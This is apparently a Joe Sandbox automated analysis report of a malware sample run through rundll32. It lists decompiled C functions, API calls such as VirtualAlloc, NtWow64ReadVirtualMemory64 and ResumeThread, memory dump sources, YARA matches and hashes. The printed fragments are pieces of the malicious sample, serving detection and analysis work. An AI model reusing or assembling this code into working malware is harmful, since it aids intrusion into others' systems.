                            • Opcode Fuzzy Hash: f927db48d7c7adf8b95b6c8233aa2ae552b32cb156b4c977c9ed4f825a005a6f
                            • Instruction Fuzzy Hash: DFE04873B48166A7DB216E749C48B6E7E50EB01784F00461DF9D7F6050D614F853D7D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11CD6 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A11CD6(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4a1a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x4a1a1c8 = GetTickCount();
				_t5 = E04A16D78(_a4);
				if(_t5 == 0) {
					_t5 = E04A14B89(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E04A16B1C(_t9) != 0) {
							 *0x4a1a300 = 1; // executed
						}
						_t7 = E04A13D2C(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                            0x04a11cd6
                            0x04a11cdf
                            0x04a11ce5
                            0x04a11cec
                            0x04a11cf0
                            0x00000000
                            0x04a11cf0
                            0x04a11cfd
                            0x04a11d02
                            0x04a11d09
                            0x04a11d0f
                            0x04a11d16
                            0x04a11d1f
                            0x04a11d21
                            0x04a11d21
                            0x04a11d2b
                            0x00000000
                            0x04a11d2b
                            0x04a11d16
                            0x04a11d30

                            APIs
                            • HeapCreate.KERNEL32(00000000,00400000,00000000,04A15E54,?), ref: 04A11CDF
                            • GetTickCount.KERNEL32 ref: 04A11CF3
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CountCreateHeapTick
                            • String ID:
                            • API String ID: 2177101570-0
                            • Opcode ID: 3e6091bbfc68f14d893d4ab51041eff1ca2989ad1edb41f9ef7f1d6deeaa1a4f
                            • Instruction ID: 6dbb2ba26ed6b4207049186914db68108e6bc1ad9b0089121b70a07e959aa21e
                            • Opcode Fuzzy Hash: 3e6091bbfc68f14d893d4ab51041eff1ca2989ad1edb41f9ef7f1d6deeaa1a4f
                            • Instruction Fuzzy Hash: 21F092B0754702ABFB112FB0AE05B1A35A8AF28788F104825EE44D40B0EBB9F801D725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81DED Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7561D
                              • Part of subcall function 04F755E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04F75653
                              • Part of subcall function 04F755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7565F
                              • Part of subcall function 04F755E4: lstrcmpi.KERNEL32(?,00000000), ref: 04F7569C
                              • Part of subcall function 04F755E4: StrChrA.SHLWAPI(?,0000002E), ref: 04F756A5
                              • Part of subcall function 04F755E4: lstrcmpi.KERNEL32(?,00000000), ref: 04F756B7
                              • Part of subcall function 04F755E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04F75708
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,04F860E0,0000002C,04F790D3,06318E36,?,00000000,04F7A484), ref: 04F81E2C
                              • Part of subcall function 04F7A806: GetProcAddress.KERNEL32(?,00000000), ref: 04F7A82F
                              • Part of subcall function 04F7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04F76230,00000000,00000000,00000028,00000100), ref: 04F7A851
                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04F860E0,0000002C,04F790D3,06318E36,?,00000000,04F7A484,?,00000318), ref: 04F81EB7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                            • String ID:
                            • API String ID: 4138075514-0
                            • Opcode ID: 94bb39b70cdb0a619839a824f0eba1eacdd95c7dff5eb382a4d2090a9d25e5e4
                            • Instruction ID: 4a66d7217ebb6541ed9c1fb0209182489f51da632e7de3ee1e26075b44fa6c8b
                            • Opcode Fuzzy Hash: 94bb39b70cdb0a619839a824f0eba1eacdd95c7dff5eb382a4d2090a9d25e5e4
                            • Instruction Fuzzy Hash: 3621F771D01229EBDF11EFA5DC84ADEBBB5FF08724F10812AE914BA150D7346942DF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F818C0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,04F80977,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F818D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 11530f47af07f0a6769826b0813d2947924ab0709c030a4537072462e59fc664
                            • Instruction ID: ae01c9e8fbdf5fdbee4512a534bf688a27da0e3d7f2f2651da1d62d0867cc2dd
                            • Opcode Fuzzy Hash: 11530f47af07f0a6769826b0813d2947924ab0709c030a4537072462e59fc664
                            • Instruction Fuzzy Hash: 513192B1E00108EFDB10EF98E9859ADB7B5FB04224B5481AEE205AF204D774BD43CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11C03 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E04A11C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x4a1a2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                            0x04a11c08
                            0x04a11c0d
                            0x04a11c1b
                            0x04a11c21
                            0x04a11c25
                            0x04a11c96
                            0x04a11c27
                            0x04a11c2b
                            0x04a11c2e
                            0x04a11c31
                            0x04a11c38
                            0x04a11c39
                            0x04a11c3a
                            0x04a11c3c
                            0x04a11c41
                            0x04a11c48
                            0x04a11c4e
                            0x04a11c4f
                            0x04a11c4f
                            0x04a11c56
                            0x04a11c57
                            0x04a11c58
                            0x04a11c5c
                            0x04a11c68
                            0x04a11c6e
                            0x04a11c6f
                            0x04a11c6f
                            0x04a11c71
                            0x04a11c77
                            0x04a11c79
                            0x04a11c7e
                            0x04a11c7f
                            0x04a11c7f
                            0x04a11c85
                            0x04a11c8e
                            0x04a11c90
                            0x04a11c93
                            0x04a11ca2

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04A11C1B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 20f35250c81e03d0ba11311283ca812d9425ecbe968bf26c19f37cf2702ebd01
                            • Instruction ID: 112ca5289720c8ca545ec7449142b0d974f716495454d766513cbaf4bccaa93b
                            • Opcode Fuzzy Hash: 20f35250c81e03d0ba11311283ca812d9425ecbe968bf26c19f37cf2702ebd01
                            • Instruction Fuzzy Hash: D3113B312453849FEB068F2DD851BE97BA9DF67358F14408EE5409F3A2C277950BC720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F64A9F Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(?,04F899DC,-0000000C,?,?,?,04F7C01A,00000006,?,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F64ADA
                              • Part of subcall function 04F674AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04F8A400), ref: 04F674C5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleInformationModuleProcessQuery
                            • String ID:
                            • API String ID: 2776635927-0
                            • Opcode ID: d4db34229c76c9fe4a78f72fcaeeef05fae73bb6e2fc42d2bf7ff0ac68609c77
                            • Instruction ID: 0dcc230e2692673cd7f58bca28a64d9e4e465903106deec8e97f9d06ebca8532
                            • Opcode Fuzzy Hash: d4db34229c76c9fe4a78f72fcaeeef05fae73bb6e2fc42d2bf7ff0ac68609c77
                            • Instruction Fuzzy Hash: BB216072A00205EFDB21EF99CC90A6A77E9EF44398724852DE9468B250D670F943DB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1375F Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A1375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x4a1a368; // 0x5539618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E04A1227F( &_v68) == 0) {
						goto L16;
					}
					_t30 = E04A16954(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E04A11CA5(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E04A1A000 = E04A1A000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E04A14274( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4a1a30c, 0) == 0x102);
				return _t30;
			}

















                            0x04a1375f
                            0x04a13765
                            0x04a1376c
                            0x04a13774
                            0x04a1377a
                            0x04a1377d
                            0x04a1377f
                            0x04a1377f
                            0x04a13787
                            0x04a13787
                            0x04a13791
                            0x00000000
                            0x00000000
                            0x04a137a0
                            0x04a137a4
                            0x04a137a8
                            0x04a137ad
                            0x04a137b1
                            0x04a137ed
                            0x04a137ef
                            0x04a137ef
                            0x04a137b3
                            0x04a137ba
                            0x04a137e4
                            0x04a137bc
                            0x04a137bc
                            0x04a137c1
                            0x04a137dd
                            0x04a137c3
                            0x04a137c3
                            0x04a137c8
                            0x04a137cd
                            0x04a137d0
                            0x04a137d2
                            0x04a137d7
                            0x04a137d9
                            0x04a137d9
                            0x04a137d7
                            0x04a137c8
                            0x04a137c1
                            0x04a137ba
                            0x04a137b1
                            0x04a137fc
                            0x04a13801
                            0x04a13801
                            0x04a13825

                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,761F81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A13811
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ObjectSingleWait
                            • String ID:
                            • API String ID: 24740636-0
                            • Opcode ID: 44bab7b901eb4b28bf265738897d269d568fa84cf7edd1958cba7ac13ed75217
                            • Instruction ID: c2b90c681c39d135327a86dad070bca8a706f5caa95cca52d92b52cb231015c6
                            • Opcode Fuzzy Hash: 44bab7b901eb4b28bf265738897d269d568fa84cf7edd1958cba7ac13ed75217
                            • Instruction Fuzzy Hash: F9216AFA7012459BFF11CF59D880BAE77B9BB91364F10403AEA159B260DB74F842C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11B6F Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                            Download Yara Rule
                            C-Code - Quality: 34%
                            			E04A11B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4a1a348; // 0xb1d5a8
				_t4 = _t15 + 0x4a1b3a0; // 0x5538948
				_t20 = _t4;
				_t6 = _t15 + 0x4a1b124; // 0x650047
				_t17 = E04A146CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04A159AE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                            0x04a11b79
                            0x04a11b80
                            0x04a11b81
                            0x04a11b82
                            0x04a11b83
                            0x04a11b89
                            0x04a11b8e
                            0x04a11b8e
                            0x04a11b98
                            0x04a11baa
                            0x04a11bb1
                            0x04a11bdf
                            0x04a11bb3
                            0x04a11bb5
                            0x04a11bba
                            0x04a11bdc
                            0x04a11bbc
                            0x04a11bbf
                            0x04a11bc6
                            0x04a11bcb
                            0x04a11bcd
                            0x04a11bcd
                            0x04a11bd2
                            0x04a11bd2
                            0x04a11bba
                            0x04a11be6

                            APIs
                              • Part of subcall function 04A146CB: SysFreeString.OLEAUT32(?), ref: 04A147AA
                              • Part of subcall function 04A159AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04A15EFA,004F0053,00000000,?), ref: 04A159B7
                              • Part of subcall function 04A159AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04A15EFA,004F0053,00000000,?), ref: 04A159E1
                              • Part of subcall function 04A159AE: memset.NTDLL ref: 04A159F5
                            • SysFreeString.OLEAUT32(00000000), ref: 04A11BD2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            • Opcode ID: 75c63f139321dbbb74f4e560ecec7a4b9619a686c924215d8a8d6253e363dc1f
                            • Instruction ID: 3f9271e2f66c3e3e4833fa53be45c31bd2197a31fe3ca7e897526964abea3fe0
                            • Opcode Fuzzy Hash: 75c63f139321dbbb74f4e560ecec7a4b9619a686c924215d8a8d6253e363dc1f
                            • Instruction Fuzzy Hash: AF015A32504119BFEF119FA8CD01EAABBB9FB18754B044465EA01E7070E370E912D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A12E4E Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E04A12E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E04A11C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x4a1a348; // 0xb1d5a8
						_t9 = _t17 + 0x4a1ba40; // 0x444f4340
						_t20 = E04A13B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x4a1a2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                            0x04a12e51
                            0x04a12e57
                            0x04a12eae
                            0x04a12e5d
                            0x04a12e68
                            0x04a12e6d
                            0x04a12e71
                            0x04a12e7e
                            0x04a12e86
                            0x04a12e92
                            0x04a12e9a
                            0x04a12ea4
                            0x04a12ea4
                            0x04a12e71
                            0x04a12eb3

                            APIs
                              • Part of subcall function 04A11C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04A11C1B
                              • Part of subcall function 04A13B58: lstrlen.KERNEL32(7620F710,?,00000000,?,7620F710), ref: 04A13B8C
                              • Part of subcall function 04A13B58: StrStrA.SHLWAPI(00000000,?), ref: 04A13B99
                              • Part of subcall function 04A13B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 04A13BB8
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04A1553D), ref: 04A12EA4
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$Allocate$Freelstrlen
                            • String ID:
                            • API String ID: 2220322926-0
                            • Opcode ID: 5a8c82df0f270dc90f402289f6a14c7ccd6800db980990c6da69eca6688e5596
                            • Instruction ID: 22bf724b5ec641cde4973d1dcf37e2d152c5a03a39a1073851071ecc5f7ad0ed
                            • Opcode Fuzzy Hash: 5a8c82df0f270dc90f402289f6a14c7ccd6800db980990c6da69eca6688e5596
                            • Instruction Fuzzy Hash: CB013C7A200608FFEB22CF44DC40FAA7BB9EB54750F144069FA49961B0E771FA55EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75D7A Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F671B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671D3
                              • Part of subcall function 04F671B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671DE
                              • Part of subcall function 04F671B4: _wcsupr.NTDLL ref: 04F671EB
                              • Part of subcall function 04F671B4: lstrlenW.KERNEL32(00000000), ref: 04F671F3
                            • ResumeThread.KERNEL32(00000004,?,04F6F2F7,?), ref: 04F75D8F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                            • String ID:
                            • API String ID: 3646851950-0
                            • Opcode ID: 25dc9e348d90b7e3ed57a1879576f2dbb6c3bd770dc095fe2f145810314299e4
                            • Instruction ID: ce4d5e08906f0623d88ccac94387cef3e2c9ae20076f37884ffbd07cd9861b5f
                            • Opcode Fuzzy Hash: 25dc9e348d90b7e3ed57a1879576f2dbb6c3bd770dc095fe2f145810314299e4
                            • Instruction Fuzzy Hash: 64D05E39608300BAEB212B20CD09F167DA2DF41B48F00E45AE9C650460C37AAC529A44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F8309E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 04F83090
                              • Part of subcall function 04F831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,04F60000), ref: 04F8325C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHelper2@8LoadRaise___delay
                            • String ID:
                            • API String ID: 123106877-0
                            • Opcode ID: 0aba6e2e3743aae45e52826188669d891af7215a1c7f43d54651a2e7eedbae7b
                            • Instruction ID: 1640b2e8efb03a39456e21b22832f54fb0ebd076eb9955aaedc8046f5c4ac125
                            • Opcode Fuzzy Hash: 0aba6e2e3743aae45e52826188669d891af7215a1c7f43d54651a2e7eedbae7b
                            • Instruction Fuzzy Hash: 81A001967AD602FE35087251AD06D3B271CC5C4E693208D2EE812CC0A0A8837A8B2476
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F83083 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 04F83090
                              • Part of subcall function 04F831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,04F60000), ref: 04F8325C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHelper2@8LoadRaise___delay
                            • String ID:
                            • API String ID: 123106877-0
                            • Opcode ID: 785477f5b6f6a36c18afe1c5e3829223b091325bccdce4a08a49d5d2593122f5
                            • Instruction ID: 221b51dcd1252ac0465940812b1a43a8a7316cecbbead3116ded4eb2273bd85f
                            • Opcode Fuzzy Hash: 785477f5b6f6a36c18afe1c5e3829223b091325bccdce4a08a49d5d2593122f5
                            • Instruction Fuzzy Hash: 8BA00296799501BD351471515D06D37171CC5D0D15320491DF811DC050644379471475
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E803 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: da39ee8d102e36fa603e341e46de3c657e3200027a3284d2431735f0f7359047
                            • Instruction ID: 3432bfbf0e6e6637ec7ef7b587f9f093ed18ed16870789fb2f8e6e5dc905b131
                            • Opcode Fuzzy Hash: da39ee8d102e36fa603e341e46de3c657e3200027a3284d2431735f0f7359047
                            • Instruction Fuzzy Hash: 5AB01231400104BBCA014F00FD04F157B21EB50700F004419B2089806082390C68FB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F69394 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: a6aaedc58c82283d80d8e5e2022a08d836a69df3c254ffa86deff2c5b565f6b7
                            • Instruction ID: 4f6369d3cd00aad983abd2882896da217c85b647dedbdc3cf24191efe80788a1
                            • Opcode Fuzzy Hash: a6aaedc58c82283d80d8e5e2022a08d836a69df3c254ffa86deff2c5b565f6b7
                            • Instruction Fuzzy Hash: 2DB01275500104BBCA014F00FE04F157B21E750700F004019B3085C06082390C24FB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16C2C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A16C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x4a1a2d8, 0, _a4); // executed
				return _t2;
			}




                            0x04a16c38
                            0x04a16c3e

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
